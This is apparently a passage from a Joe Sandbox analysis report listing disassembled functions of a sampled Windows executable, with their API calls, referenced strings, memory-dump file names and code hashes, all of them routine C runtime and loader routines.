GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,004F5CA3,000000FF,?,004E72CC,004E71B3,?,004E7368,00000000), ref: 004E7240
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,004F5CA3,000000FF,?,004E72CC,004E71B3,?,004E7368,00000000), ref: 004E7252
FreeLibrary.KERNEL32(00000000,?,?,00000000,004F5CA3,000000FF,?,004E72CC,004E71B3,?,004E7368,00000000), ref: 004E7274

Strings

CorExitProcess, xrefs: 004E724A
mscoree.dll, xrefs: 004E7239
f2N, xrefs: 004E7263

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$f2N$mscoree.dll
API String ID: 4061214504-910826858
Opcode ID: 2355bfe69f99ae440f8c8e13b386a9891451ca7418b5b0231942854c0adb9b52
Instruction ID: dbb457a70cc5ad449ec3bf9d0adc6983b1f1e46cacdda80b76889d0e0767bceb
Opcode Fuzzy Hash: 2355bfe69f99ae440f8c8e13b386a9891451ca7418b5b0231942854c0adb9b52
Instruction Fuzzy Hash: B501A27194469DAFDB118F55CD49BBEBBB8FB04B26F104936F911A22D0DB789810CB88

Function 004E3269 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004E326F
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004E327D
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004E328E

Strings

kernel32.dll, xrefs: 004E326A
GetTempPath2W, xrefs: 004E3283
GetSystemTimePreciseAsFileTime, xrefs: 004E3277

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 0bc485e53f564070ad43509a40123167d2e3e1b4e1a1a235ab05006dbdcdb1eb
Instruction ID: 030c2180853b82939f854c4c296609c96ff308b8a412d47a21f71583818a4387
Opcode Fuzzy Hash: 0bc485e53f564070ad43509a40123167d2e3e1b4e1a1a235ab05006dbdcdb1eb
Instruction Fuzzy Hash: 1ED0A7B15812986FC300AFB0BD4C9B63F95EE053403114033FA08D2310DB740421CF9D

Function 004E8639 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004E8630,004E443B,004E3B4A), ref: 004E8647
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004E8655
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E866E
SetLastError.KERNEL32(00000000,004E8630,004E443B,004E3B4A), ref: 004E86C0

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5cbce045127b9657caeab8f853b3b9c01aca35ac18037df41e9cdb7a6e7309c3
Instruction ID: 29c8696a6180125dd52c781c27b408f51fe807a7412f821642c13ef15e8dc18f
Opcode Fuzzy Hash: 5cbce045127b9657caeab8f853b3b9c01aca35ac18037df41e9cdb7a6e7309c3
Instruction Fuzzy Hash: 2701D4322083925EAE25277BBCC553B2785EB4177F720063FF518452F0EF595C21918C

Function 004E8EC9 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 004E8FE8
CallUnexpected.LIBVCRUNTIME ref: 004E9261

Strings

csm, xrefs: 004E901F
csm, xrefs: 004E8F06
csm, xrefs: 004E8F73

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 42e9184124ad4c701ef1d53e3cebb99c655e609bcfbb8f42b37a8a301d784419
Instruction ID: faafa6106325cdfaa9a5367462a12935de7f479949a097045fec0bf31ec3126c
Opcode Fuzzy Hash: 42e9184124ad4c701ef1d53e3cebb99c655e609bcfbb8f42b37a8a301d784419
Instruction Fuzzy Hash: 8FB18871800289EFCF14DFA6C8849AEB7B9BF04306F14459FE8156B282D739DE51CB99

Function 004E8BF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004E8CB7
___AdjustPointer.LIBCMT ref: 004E8CDA
___AdjustPointer.LIBCMT ref: 004E8D76

Strings

f2N, xrefs: 004E8C4F

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AdjustPointer
String ID: f2N
API String ID: 1740715915-3473888870
Opcode ID: f82c0f00299a604b2c16f1948ce1c398e511bfce0618aea6098c9b2c6770c39b
Instruction ID: c85decbac06da8aa923f296293e66adfa0a03cd46c206ca2bab7cd37f5dcfb1e
Opcode Fuzzy Hash: f82c0f00299a604b2c16f1948ce1c398e511bfce0618aea6098c9b2c6770c39b
Instruction Fuzzy Hash: 1951DF72A012869FEF298F53D841F7A73A4EF50307F24452FE809572D1DB38A851C7A8

Function 004EF1A5 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004EF22A
__alloca_probe_16.LIBCMT ref: 004EF2F3
__freea.LIBCMT ref: 004EF35A

Part of subcall function 004EB8D6: HeapAlloc.KERNEL32(00000000,004E2CB3,004E20CA,?,004E4545,004E20CC,004E20CA,?,?,?,004E23F8,004E2CB3,004E20CE,004E20CA,004E20CA,004E20CA), ref: 004EB908

__freea.LIBCMT ref: 004EF36D
__freea.LIBCMT ref: 004EF37A

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: feecee7aaec537a8de88f001675fe50c7a7e0e9e7d9916fd496d4f9318ce74e7
Instruction ID: b9cc9a5541b4ef260a597690386e19837797a05c6903fd3cbacdbbed8ec6b4a5
Opcode Fuzzy Hash: feecee7aaec537a8de88f001675fe50c7a7e0e9e7d9916fd496d4f9318ce74e7
Instruction Fuzzy Hash: B451D37260028AAFDB209F67CC81EBB76A9EF44756B15053FFD04D6250EB78CC14C668

Function 004E30C1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32(004FE64C,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E30D5
AcquireSRWLockExclusive.KERNEL32(?,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E30F4
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E3122
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E317D
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E3194

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: cc43c2eab41b94efca16986990c753b52e64983f005bc7b139cea560e2b0b944
Instruction ID: 797ec950b60df43a2bcef84ead2ac1e664097b952eb31c4c60d1f882e8929af2
Opcode Fuzzy Hash: cc43c2eab41b94efca16986990c753b52e64983f005bc7b139cea560e2b0b944
Instruction Fuzzy Hash: B341383060068ADBCB26CF67C98896AF3B5FF05317B50892FD44697A40D738EA45CB69

Function 004E8B59 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 004E8DD0

Strings

csm, xrefs: 004E8E63
csm, xrefs: 004E8DF2
f2N, xrefs: 004E8E98

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm$f2N
API String ID: 3493665558-4118698419
Opcode ID: 329689eaa7c96e80bdbe1b0b0d4d2f8022258f6be0f1bdf4982b59f82cb54830
Instruction ID: e6d59a5d26ca582b3d05a9c98b0659f1a8c9dd67b1951e8a0796d6740100b500
Opcode Fuzzy Hash: 329689eaa7c96e80bdbe1b0b0d4d2f8022258f6be0f1bdf4982b59f82cb54830
Instruction Fuzzy Hash: 7D31D6318002889BCF268F9ACD4096B7B66FF1971BB14459FF85C89221CB3ADC61DB95

Function 004E1C40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registrywindowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 004E1C9D
RegisterClassW.USER32(?), ref: 004E1CB2
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004E1CDB

Strings

`O, xrefs: 004E1CA7

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ClassHandleMessageModuleRegister
String ID: `O
API String ID: 1585107554-1900571490
Opcode ID: 6addfd029342aff327c0941a4b51867e55abe4471d99fcf0700e600ec2a0d08a
Instruction ID: 8dc3b02378dbf193aca33bcfa74388ef0bf8223f888fc6e38c51fed85050d31c
Opcode Fuzzy Hash: 6addfd029342aff327c0941a4b51867e55abe4471d99fcf0700e600ec2a0d08a
Instruction Fuzzy Hash: 3421A2B1C8038D9BDB10CFA1DD45BEEBBB4FF45714F20522AE508B6250E7B81690CB98

Function 004EEEE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,004EEF82,00000000,?,004FF760,?,?,?,004EEEB9,00000004,InitializeCriticalSectionEx,004F78B0,004F78B8), ref: 004EEEF3
GetLastError.KERNEL32(?,004EEF82,00000000,?,004FF760,?,?,?,004EEEB9,00000004,InitializeCriticalSectionEx,004F78B0,004F78B8,00000000,?,004E951C), ref: 004EEEFD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 004EEF25

Strings

api-ms-, xrefs: 004EEF0A

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: aefb92c1cd499ee75fc578f8b51b5180f78d651b4c4020f5c9c1f54ce3afe991
Instruction ID: ba38d6b1142de347ce68c22e378a92d5380a1ccedae0f9ba115d150138edeedd
Opcode Fuzzy Hash: aefb92c1cd499ee75fc578f8b51b5180f78d651b4c4020f5c9c1f54ce3afe991
Instruction Fuzzy Hash: 1AE01A3168428CB6EB105B62ED46F793E56EB08B56F104031F90CA81E1DB66A820994C

Function 004EF86C Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 004EF8CF

Part of subcall function 004EE356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004EF350,?,00000000,-00000008), ref: 004EE3B7

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004EFB21
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004EFB67
GetLastError.KERNEL32 ref: 004EFC0A

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: ff896ca65fe88481f101e41b637f206f207c4bdfc0f510fd82fc1965079f89d0
Instruction ID: b793e5a9952eae2cf7b9177b4b0e31a34aa1ca067f5899218f95f312baaff20b
Opcode Fuzzy Hash: ff896ca65fe88481f101e41b637f206f207c4bdfc0f510fd82fc1965079f89d0
Instruction Fuzzy Hash: 4AD1AEB5D00288AFCF14CFA9D880AEEBBB5FF09305F24412AE956EB351D734A945CB54

Function 004ED6FF Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 004EE356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004EF350,?,00000000,-00000008), ref: 004EE3B7

GetLastError.KERNEL32(?,?,?,00000000,00000000,?,004EDAA5,?,?,?,00000000), ref: 004ED763
__dosmaperr.LIBCMT ref: 004ED76A
GetLastError.KERNEL32(00000000,004EDAA5,?,?,00000000,?,?,?,00000000,00000000,?,004EDAA5,?,?,?,00000000), ref: 004ED7A4
__dosmaperr.LIBCMT ref: 004ED7AB

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: a37366888a8b012fb6e6cf3681e2b2267c796d1c40f31ffe869ae3e3fd855806
Instruction ID: ffb8b0524311f2daf323266539626af169298d38041e3eac8c582f8a366b4416
Opcode Fuzzy Hash: a37366888a8b012fb6e6cf3681e2b2267c796d1c40f31ffe869ae3e3fd855806
Instruction Fuzzy Hash: EC21D771A00285AFDB20AF77D88182BB7A9FF4436A710852FF91987250D738EC408799

Function 004EDC9B Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 004c5ebf7016cc2a429cf143740bfdb9bacc4bc3fdb9a7c5dcf49a3cc08a9deb
Instruction ID: 15905a2eebc9461af385f875af3a7440a7ba6be052670de9b02c2609af68f94c
Opcode Fuzzy Hash: 004c5ebf7016cc2a429cf143740bfdb9bacc4bc3fdb9a7c5dcf49a3cc08a9deb
Instruction Fuzzy Hash: DE219231E00289EF9B20AF739C81D6B7768EF4036A710452BF91997250DB38EC50C799

Function 004EE452 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004EE45A

Part of subcall function 004EE356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004EF350,?,00000000,-00000008), ref: 004EE3B7

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EE492
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EE4B2

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 26e98a53a30b934244be966a72a9165bc6360b9e406d95a4f33f5ed62d563918
Instruction ID: 7736ae442610e9907bfbd2ed0677abe5656bf3d727b0bea4e556abca18e7cfa9
Opcode Fuzzy Hash: 26e98a53a30b934244be966a72a9165bc6360b9e406d95a4f33f5ed62d563918
Instruction Fuzzy Hash: 5711C4F29016997F672137B3ADC9C7F295CDF4439A711042AF905D1281FE28DD01817E

Function 004F429C Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,004F311E,00000000,00000001,?,?,?,004EFC5E,?,00000000,00000000), ref: 004F42B3
GetLastError.KERNEL32(?,004F311E,00000000,00000001,?,?,?,004EFC5E,?,00000000,00000000,?,?,?,004EF5A4,?), ref: 004F42BF

Part of subcall function 004F4310: CloseHandle.KERNEL32(FFFFFFFE,004F42CF,?,004F311E,00000000,00000001,?,?,?,004EFC5E,?,00000000,00000000,?,?), ref: 004F4320

___initconout.LIBCMT ref: 004F42CF

Part of subcall function 004F42F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004F428D,004F310B,?,?,004EFC5E,?,00000000,00000000,?), ref: 004F4304

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,004F311E,00000000,00000001,?,?,?,004EFC5E,?,00000000,00000000,?), ref: 004F42E4

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: beeea429308866e40f5dac41dbf8223daa2e30b11d7e3d801495b46097e02bb0
Instruction ID: 208f67091c6c7e2551cb53f20588245a241add431e586c98f5f9792c4756819b
Opcode Fuzzy Hash: beeea429308866e40f5dac41dbf8223daa2e30b11d7e3d801495b46097e02bb0
Instruction Fuzzy Hash: 24F0F837500118BBCF221FE69C049AE3F26EF893A1B014471FA0895230CA328920DBA8

Function 004E38D1 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 004E38E3
GetCurrentThreadId.KERNEL32 ref: 004E38F2
GetCurrentProcessId.KERNEL32 ref: 004E38FB
QueryPerformanceCounter.KERNEL32(?), ref: 004E3908

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 20916d76fe32a96991029c62488466a31a32a17b242dfcae133c44c7e97df1f4
Instruction ID: 3bfa3aeba0c157efc870a2a102dd06777a3c9ec1d827bf4950336c330389af47
Opcode Fuzzy Hash: 20916d76fe32a96991029c62488466a31a32a17b242dfcae133c44c7e97df1f4
Instruction Fuzzy Hash: E8F05F75D1020DEBCB00DBB4DA8999EBBF4EF1C200B9145A5A412E6110EA30AB54DB55

Function 004E92ED Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,004E91EE,?,?,00000000,00000000,00000000,?), ref: 004E9312

Strings

MOC, xrefs: 004E9324
RCC, xrefs: 004E932C

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 41766b43f81166e623d3c3c60ff9773f9b872b3f8d1c88be4a6de2ff87d93f59
Instruction ID: 45d0440b6ee468982672d904edc0a2a54e002cc86dd0d13e214571b77003e069
